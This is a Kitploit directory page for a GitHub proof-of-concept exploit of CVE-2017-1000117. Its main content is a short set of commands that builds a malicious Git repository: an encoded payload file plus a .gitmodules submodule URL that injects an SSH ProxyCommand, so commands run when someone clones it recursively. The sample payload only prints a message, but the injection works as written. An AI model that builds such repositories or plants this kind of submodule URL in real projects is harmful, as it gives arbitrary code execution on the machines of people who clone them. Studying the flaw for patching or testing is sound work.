Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2017-1000117 — Proof-of-concept exploit for CVE-2017-1000117, demonstrating remote code execution via malicious Git submodule URLs using SSH ProxyCommand injection. | Kitploit
Tools/GitHubGitHub/ikmski/cve-2017-1000117
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRed Teaming
GitHubikmski/cve-2017-1000117

CVE-2017-1000117

Proof-of-concept exploit for CVE-2017-1000117, demonstrating remote code execution via malicious Git submodule URLs using SSH ProxyCommand injection.

View Repository
9 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2017-1000117

How it works?

root@kitploit:~
$ git clone --recursive [email protected]:ikmski/CVE-2017-1000117.git

How to create this repository

root@kitploit:~
$ cat message.txt | gzip | base64 > command


$ git submodule add [email protected]:ikmski/Hello-World.git subs/CVE-2017-1000117

$ cat << EOS > .gitmodules
[submodule "subs/CVE-2017-1000117"]
    path = subs/CVE-2017-1000117
    url = ssh://-oProxyCommand=cat command | base64 --decode | gzip -d >&2 /subs/CVE-2017-1000117
EOS

$ git submodule sync
$ git submodule update
Download Tool